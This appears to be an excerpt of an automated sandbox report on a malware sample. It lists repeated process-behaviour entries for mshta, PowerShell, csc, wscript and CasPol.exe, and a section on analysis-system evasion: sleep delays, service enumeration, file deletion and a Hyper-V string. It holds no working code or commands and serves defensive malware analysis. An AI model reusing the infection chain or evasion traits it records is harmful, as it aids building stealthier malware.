                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BCF3
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040E54F Sleep,ExitProcess
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle (12_2_004198D2)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7113
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2515
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3548
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6225
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 3694
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 6293
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_12-52672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | API coverage: 9.5 %
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576 | Thread sleep count: 7113 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580 | Thread sleep count: 2515 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624 | Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7888 | Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208 | Thread sleep count: 3694 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208 | Thread sleep time: -11082000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208 | Thread sleep count: 6293 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7208 | Thread sleep time: -18879000s >= -30000s
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 13_2_00418981 memset,GetSystemInfo
                    Source: CasPol.exe, 0000000C.00000002.4133634036.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWv
                    Source: powershell.exe, 00000003.00000002.1793452153.0000000004969000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
